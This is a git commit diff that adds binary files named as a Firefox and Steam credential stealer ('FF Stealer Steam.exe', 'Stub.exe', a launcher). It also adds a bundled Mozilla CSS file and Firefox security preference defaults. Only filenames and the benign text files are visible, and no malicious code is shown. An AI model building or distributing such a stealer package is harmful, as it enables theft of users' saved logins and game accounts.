commit 1d5f7e036a0b2a60479d304cc1b984bcd055b0da Author: i2p Date: Thu Aug 27 10:54:41 2026 -0600 initial commit diff --git a/CPFilters.dll b/CPFilters.dll new file mode 100644 index 0000000..adc0a2b Binary files /dev/null and b/CPFilters.dll differ diff --git a/FF Stealer Steam.exe b/FF Stealer Steam.exe new file mode 100644 index 0000000..6fb7af0 Binary files /dev/null and b/FF Stealer Steam.exe differ diff --git a/Stub.exe b/Stub.exe new file mode 100644 index 0000000..f9e0f88 Binary files /dev/null and b/Stub.exe differ diff --git a/npnul32.dll b/npnul32.dll new file mode 100644 index 0000000..689386b Binary files /dev/null and b/npnul32.dll differ diff --git a/opengl32/Ionic.Zip.dll b/opengl32/Ionic.Zip.dll new file mode 100644 index 0000000..1dc0338 Binary files /dev/null and b/opengl32/Ionic.Zip.dll differ diff --git a/opengl32/Jint.dll b/opengl32/Jint.dll new file mode 100644 index 0000000..c8392b7 Binary files /dev/null and b/opengl32/Jint.dll differ diff --git a/opengl32/LICENCE.dat b/opengl32/LICENCE.dat new file mode 100644 index 0000000..9593dca Binary files /dev/null and b/opengl32/LICENCE.dat differ diff --git a/opengl32/Launcher.exe b/opengl32/Launcher.exe new file mode 100644 index 0000000..55b45c3 Binary files /dev/null and b/opengl32/Launcher.exe differ diff --git a/opengl32/Stub.exe b/opengl32/Stub.exe new file mode 100644 index 0000000..f9e0f88 Binary files /dev/null and b/opengl32/Stub.exe differ diff --git a/opengl32/designmode.css b/opengl32/designmode.css new file mode 100644 index 0000000..6e2598c --- /dev/null +++ b/opengl32/designmode.css @@ -0,0 +1,41 @@ +/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */ +/* ***** BEGIN LICENSE BLOCK ***** + * Version: MPL 1.1/GPL 2.0/LGPL 2.1 + * + * The contents of this file are subject to the Mozilla Public License Version + * 1.1 (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * http://www.mozilla.org/MPL/ + * + * Software distributed under the License is distributed on an "AS IS" basis, + * WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License + * for the specific language governing rights and limitations under the + * License. + * + * The Original Code is Mozilla.org code. + * + * The Initial Developer of the Original Code is + * Disruptive Innovations. + * Portions created by the Initial Developer are Copyright (C) 2004 + * the Initial Developer. All Rights Reserved. + * + * Contributor(s): + * Peter Van der Beken + * + * Alternatively, the contents of this file may be used under the terms of + * either of the GNU General Public License Version 2 or later (the "GPL"), + * or the GNU Lesser General Public License Version 2.1 or later (the "LGPL"), + * in which case the provisions of the GPL or the LGPL are applicable instead + * of those above. If you wish to allow use of your version of this file only + * under the terms of either the GPL or the LGPL, and not to allow others to + * use your version of this file under the terms of the MPL, indicate your + * decision by deleting the provisions above and replace them with the notice + * and other provisions required by the GPL or the LGPL. If you do not delete + * the provisions above, a recipient may use your version of this file under + * the terms of any one of the MPL, the GPL or the LGPL. + * + * ***** END LICENSE BLOCK ***** */ + +*|* { + -moz-user-modify: read-write; +} diff --git a/opengl32/ffs.exe b/opengl32/ffs.exe new file mode 100644 index 0000000..a727635 Binary files /dev/null and b/opengl32/ffs.exe differ diff --git a/opengl32/security-prefs.js b/opengl32/security-prefs.js new file mode 100644 index 0000000..31c986c --- /dev/null +++ b/opengl32/security-prefs.js @@ -0,0 +1,83 @@ +pref("general.useragent.security", "U"); + +pref("security.enable_ssl2", false); +pref("security.enable_ssl3", true); +pref("security.enable_tls", true); +pref("security.enable_tls_session_tickets", true); + +pref("security.ssl.allow_unrestricted_renego_everywhere__temporarily_available_pref", true); +pref("security.ssl.renego_unrestricted_hosts", ""); +pref("security.ssl.treat_unsafe_negotiation_as_broken", false); +pref("security.ssl.require_safe_negotiation", false); + +pref("security.ssl2.rc4_128", false); +pref("security.ssl2.rc2_128", false); +pref("security.ssl2.des_ede3_192", false); +pref("security.ssl2.des_64", false); +pref("security.ssl2.rc4_40", false); +pref("security.ssl2.rc2_40", false); +pref("security.ssl3.rsa_rc4_128_md5", true); +pref("security.ssl3.rsa_rc4_128_sha", true); +pref("security.ssl3.rsa_fips_des_ede3_sha", true); +pref("security.ssl3.rsa_des_ede3_sha", true); +pref("security.ssl3.rsa_fips_des_sha", false); +pref("security.ssl3.rsa_des_sha", false); +pref("security.ssl3.rsa_1024_rc4_56_sha", false); +pref("security.ssl3.rsa_1024_des_cbc_sha", false); +pref("security.ssl3.rsa_rc4_40_md5", false); +pref("security.ssl3.rsa_rc2_40_md5", false); +// Camellia is broken on Windows CE for now, see bug 508113 +//@line 31 "e:\builds\moz2_slave\rel-192-xr-w32-bld\build\netwerk\base\public\security-prefs.js" +pref("security.ssl3.dhe_rsa_camellia_256_sha", true); +pref("security.ssl3.dhe_dss_camellia_256_sha", true); +pref("security.ssl3.rsa_camellia_256_sha", true); +pref("security.ssl3.dhe_rsa_camellia_128_sha", true); +pref("security.ssl3.dhe_dss_camellia_128_sha", true); +pref("security.ssl3.rsa_camellia_128_sha", true); +//@line 38 "e:\builds\moz2_slave\rel-192-xr-w32-bld\build\netwerk\base\public\security-prefs.js" +pref("security.ssl3.dhe_rsa_aes_256_sha", true); +pref("security.ssl3.dhe_dss_aes_256_sha", true); +pref("security.ssl3.rsa_aes_256_sha", true); +pref("security.ssl3.ecdhe_ecdsa_aes_256_sha", true); +pref("security.ssl3.ecdhe_ecdsa_aes_128_sha", true); +pref("security.ssl3.ecdhe_ecdsa_des_ede3_sha", true); +pref("security.ssl3.ecdhe_ecdsa_rc4_128_sha", true); +pref("security.ssl3.ecdhe_ecdsa_null_sha", false); +pref("security.ssl3.ecdhe_rsa_aes_256_sha", true); +pref("security.ssl3.ecdhe_rsa_aes_128_sha", true); +pref("security.ssl3.ecdhe_rsa_des_ede3_sha", true); +pref("security.ssl3.ecdhe_rsa_rc4_128_sha", true); +pref("security.ssl3.ecdhe_rsa_null_sha", false); +pref("security.ssl3.ecdh_ecdsa_aes_256_sha", true); +pref("security.ssl3.ecdh_ecdsa_aes_128_sha", true); +pref("security.ssl3.ecdh_ecdsa_des_ede3_sha", true); +pref("security.ssl3.ecdh_ecdsa_rc4_128_sha", true); +pref("security.ssl3.ecdh_ecdsa_null_sha", false); +pref("security.ssl3.ecdh_rsa_aes_256_sha", true); +pref("security.ssl3.ecdh_rsa_aes_128_sha", true); +pref("security.ssl3.ecdh_rsa_des_ede3_sha", true); +pref("security.ssl3.ecdh_rsa_rc4_128_sha", true); +pref("security.ssl3.ecdh_rsa_null_sha", false); +pref("security.ssl3.dhe_rsa_aes_128_sha", true); +pref("security.ssl3.dhe_dss_aes_128_sha", true); +pref("security.ssl3.rsa_aes_128_sha", true); +pref("security.ssl3.dhe_rsa_des_ede3_sha", true); +pref("security.ssl3.dhe_dss_des_ede3_sha", true); +pref("security.ssl3.dhe_rsa_des_sha", false); +pref("security.ssl3.dhe_dss_des_sha", false); +pref("security.ssl3.rsa_null_sha", false); +pref("security.ssl3.rsa_null_md5", false); +pref("security.ssl3.rsa_seed_sha", true); + +pref("security.default_personal_cert", "Ask Every Time"); +pref("security.remember_cert_checkbox_default_setting", true); +pref("security.ask_for_password", 0); +pref("security.password_lifetime", 30); +pref("security.warn_entering_secure", false); +pref("security.warn_entering_weak", true); +pref("security.warn_leaving_secure", false); +pref("security.warn_viewing_mixed", true); +pref("security.warn_submit_insecure", false); + +pref("security.OCSP.enabled", 1); +pref("security.OCSP.require", false); diff --git a/verifier.exe b/verifier.exe new file mode 100644 index 0000000..7cffbaf Binary files /dev/null and b/verifier.exe differ